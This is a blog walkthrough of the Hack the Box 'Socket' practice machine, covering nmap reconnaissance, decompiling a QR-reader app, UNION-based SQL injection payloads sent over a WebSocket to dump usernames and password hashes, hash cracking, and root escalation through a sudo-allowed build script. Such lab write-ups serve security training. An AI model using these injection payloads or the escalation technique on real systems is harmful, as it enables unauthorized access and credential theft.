In this post, I would like to share a walkthrough of the Socket Machine from Hack the Box
This room will be considered a medium machine on Hack the Box

Contents
What will you gain from the Socket machine?
For the user flag, you will need to download the Windows Application which requires our attention especially when we need to analyze the application workflow. We can also use Stews tools to provide us with some information on the potential vulnerability. We should be obtaining a credential when we are playing the WebSocket with SQL Injection.
As for the root flag, you only need to abuse a bash script called build_installer.sh which we should be getting a root shell
Information Gathering on Socket Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
┌─[darknite@parrot]─[~/Document/htb/socket]
└──╼ $nmap -sC -sV 10.10.14.206 -oA intial
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-26 09:30 EDT
Nmap scan report for 10.129.193.144
Host is up (0.19s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:a28 (ECDSA)
|_ 256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://qreader.htb/
Service Info: Host: qreader.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.85 seconds
We have some information from the Nmap result which we managed to obtain the domain of the website.
┌─[darknite@parrot]─[~/Document/htb/socket]
└──╼ $nmap -p- -sC -sV 10.10.14.206 -oA full
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-26 09:33 EDT
Stats: 0:13:55 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
5789/tcp open unknown
| fingerprint-strings:
| GenericLines, GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad Request
| Date: Sun, 26 Mar 2023 13:56:07 GMT
| Server: Python/3.10 websockets/10.4
| Content-Length: 77
| Content-Type: text/plain
| Connection: close
| Failed to open a WebSocket connection: did not receive a valid HTTP request.
| Help, SSLSessionReq:
| HTTP/1.1 400 Bad Request
| Date: Sun, 26 Mar 2023 13:56:24 GMT
| Server: Python/3.10 websockets/10.4
| Content-Length: 77
| Content-Type: text/plain
| Connection: close
| Failed to open a WebSocket connection: did not receive a valid HTTP request.
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Date: Sun, 26 Mar 2023 13:56:08 GMT
| Server: Python/3.10 websockets/10.4
| Content-Length: 77
| Content-Type: text/plain
| Connection: close
|_ Failed to open a WebSocket connection: did not receive a valid HTTP request.
Service Info: Host: qreader.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1451.82 seconds
When we try to run the full port and managed to see a new port that we haven’t seen before. Therefore, let’s access the website interface for now

The website interface shows that we can upload files to read your QR code.


However, we can download the Qreader file on our attacker’s machine and try to unzip it which it will allow us to look into the folder.

As shown above, the file can be read using the python3.9 version

Let’s decompile back the pyc file back to the python file

For that purpose, we will use the uncompyle6 tool to decompile it.


If all requirements are met, we should be able to see the source

However, don’t be worried if we cannot see the source because we have another method to analyze the website vulnerability which we managed to see that it’s vulnerable to Vanilla CSWSH vulnerability
Enumerate the WebSocket with SQL Injection

The source code will look something as shown above.
Disclaimer: I didn’t code this Python code
1) '0.0.3" UNION SELECT group_concat(name),2,3,4 from sqlite_schema-- -'
2) '0.0.3" UNION SELECT sqlite_version(),2,3,4-- -'
3) '0.0.3" UNION SELECT 1,2,3,4-- -'
4) '0.0.3" UNION SELECT group_concat(answered_by),group_concat(answer),3,4 from answers-- -'
5) '0.0.3" UNION SELECT username,password,3,4 from users-- -'
The SQL command above is one that we will be using to obtain the details, especially username and password

The first MySQL command that we found

The second Mysql command

The third mysql command

Fourth mysql command

Last mysql command

At last, we managed to retrieve the hashes and try to crack the hash by using the crackstation


We can also use hashcat to retrieve the password

As a result, we have successfully accessed the machine via SSH service.


We can read the user flag by typing the “cat user.txt” command
Escalate to Root Privileges Access

As usual, we can find the file that we can abuse by running the “sudo -l” command
(remote) tkeller@socket:/home/tkeller$ cat /usr/local/sbin/build-installer.sh
#!/bin/bash
if [ $# -ne 2 ] && [[ $1 != 'cleanup' ]]; then
/usr/bin/echo "No enough arguments supplied"
exit 1;
fi
action=$1
name=$2
ext=$(/usr/bin/echo $2 |/usr/bin/awk -F'.' '{ print $(NF) }')
if [[ -L $name ]];then
/usr/bin/echo 'Symlinks are not allowed'
exit 1;
fi
if [[ $action == 'build' ]]; then
if [[ $ext == 'spec' ]] ; then
/usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
/home/svc/.local/bin/pyinstaller $name
/usr/bin/mv ./dist ./build /opt/shared
else
echo "Invalid file format"
exit 1;
fi
elif [[ $action == 'make' ]]; then
if [[ $ext == 'py' ]] ; then
/usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
/root/.local/bin/pyinstaller -F --name "qreader" $name --specpath /tmp
/usr/bin/mv ./dist ./build /opt/shared
else
echo "Invalid file format"
exit 1;
fi
elif [[ $action == 'cleanup' ]]; then
/usr/bin/rm -r ./build ./dist 2>/dev/null
/usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
/usr/bin/rm /tmp/qreader* 2>/dev/null
else
/usr/bin/echo 'Invalid action'
exit 1;
fi
if [[ $action == 'build' ]]; then
if [[ $ext == 'spec' ]] ; then
/usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
/home/svc/.local/bin/pyinstaller $name
/usr/bin/mv ./dist ./build /opt/shared
else
echo "Invalid file format"
exit 1;
fi
The source code above shows that we can use the command injection to obtain the root shell



We can execute the malicious command above



We can read the root flag by typing the “cat root.txt” command